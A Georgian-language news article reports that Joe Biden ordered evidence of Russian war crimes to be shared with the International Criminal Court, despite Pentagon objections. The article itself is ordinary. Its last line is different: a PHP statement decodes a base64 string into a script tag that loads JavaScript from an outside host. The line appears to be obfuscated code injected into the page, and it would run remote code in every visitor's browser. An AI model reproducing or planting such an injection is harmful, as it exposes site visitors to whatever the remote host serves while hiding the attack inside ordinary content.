celsiusi
ავერსი საქკაბელი

აშშ-ის პრეზიდენტმა, ჯო ბაიდენმა რუსული ომის დანაშაულის მტკიცებულებების ჰააგის სისხლის სამართლის საერთაშორისო სასამართლოსთვის გადაცემის განკარგულება გასცა. ამის შესახებ სააგენტო „როიტერი“ წერს.

სააგენტოს ცნობით, პენტაგონმა წინააღმდეგობა გაუწია ამ ნაბიჯს და ამტკიცებდა, რომ სასამართლოსთან ნებისმიერ თანამშრომლობას შეეძლო, გზა გაეხსნა საზღვარგარეთ განლაგებული ამერიკული ჯარების პოლიტიზებული დევნისთვის.

თეთრმა სახლმა უარი თქვა საერთაშორისო სასამართლოსთან თანამშრომლობის სპეციფიკის განხილვაზე.

„რუსეთის უკრაინაზე თავდასხმის დაწყების დღიდან პრეზიდენტი ცხადი იყო: პასუხისმგებლობა უნდა დადგეს უკრაინაში ომის დანაშაულებისა და სისასტიკეების ჩამდენი და ხელშემწყობი პირების მიმართ. კონკრეტულად ჰააგის სისხლის სამართლის საერთაშორისო სასამართლოსთან ჩვენ არ ვაპირებთ თანამშრომლობის რამე სპეციფიკის განხილვას“, – აღნიშნა აშშ-ის ეროვნული უშიშროების საბჭოს სპიკერმა.

როგორც „როიტერი“ აღნიშნავს, უკრაინის ხელისუფლებასა და დასავლეთში აცხადებენ, რომ არსებობს მტკიცებულებები მკვლელობებისა და სიკვდილით დასჯის, სამოქალაქო ინფრასტრუქტურის დაბომბვის, იძულებითი დეპორტაციის, ბავშვების გატაცების, წამების, სექსუალური ძალადობისა და უკანონო დაკავებების შესახებ.

შეგახსენებთ, ჰააგის სისხლის სამართლის საერთაშორისო სასამართლომ რუსეთის პრეზიდენტის, ვლადიმერ პუტინის დაკავების ორდერი მარტში გასცა. საპასუხოდ რუსეთმა დაპატიმრების ორდერი გასცა მოსამართლეზე, რომელმაც პუტინის დაკავების ორდერი მოამზადა.

340
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");